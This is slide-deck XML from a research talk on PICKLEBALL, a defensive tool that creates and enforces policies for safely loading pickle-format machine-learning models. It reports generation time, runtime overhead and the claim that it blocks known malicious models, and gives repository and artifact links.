              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1095" name="Google Shape;1095;p87"/>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1096" name="Google Shape;1096;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013600" y="959225"/>
            <a:ext cx="5116800" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>runtime overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>practical? </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097" name="Google Shape;1097;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982575" y="2884150"/>
            <a:ext cx="3059700" cy="489300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>generates policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>&lt;30 seconds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> per library.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160500" y="2850800"/>
            <a:ext cx="3354600" cy="444600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>enforces policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> with a median </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.75% runtime overhead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p87"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1770200"/>
            <a:ext cx="0" cy="2605800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="887925" y="1873625"/>
            <a:ext cx="3249000" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy generation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>a priori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>/ off-line)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1101" name="Google Shape;1101;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775000" y="1873625"/>
            <a:ext cx="4125600" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy enforcement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> (during loading / on-line)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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05" name="Shape 1105"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Provides Security and Usability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107;p88"/>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1108" name="Google Shape;1108;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="4096050"/>
            <a:ext cx="21267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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>GitHub: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>columbia/pickleball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="4290150"/>
            <a:ext cx="32868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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Artifact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>doi.org/10.5281/zenodo.16974644</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p88" title="frame(1).png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197650" y="2857749"/>
            <a:ext cx="1282925" cy="1282925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1225575"/>
            <a:ext cx="7742700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Our study shows </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>ickle models are still prevalent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>in the model ecosystem, and existing security approaches are insufficient.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112" name="Google Shape;1112;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="2157350"/>
            <a:ext cx="7742700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>protects model users with library-specific policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> that block all known malicious models and load more benign models than other secure alternatives.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385675" y="4125284"/>
            <a:ext cx="2423100" cy="554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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Andreas D. Kellas</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>andreas.kellas@columbia.edu</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2995550" y="2954238"/>
            <a:ext cx="1058775" cy="1053224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1115" name="Google Shape;1115;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750475" y="2954238"/>
            <a:ext cx="1058775" cy="1053215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505399" y="2954250"/>
            <a:ext cx="1058775" cy="1053234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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20" name="Shape 1120"/>
        <p:cNvGrpSpPr/>
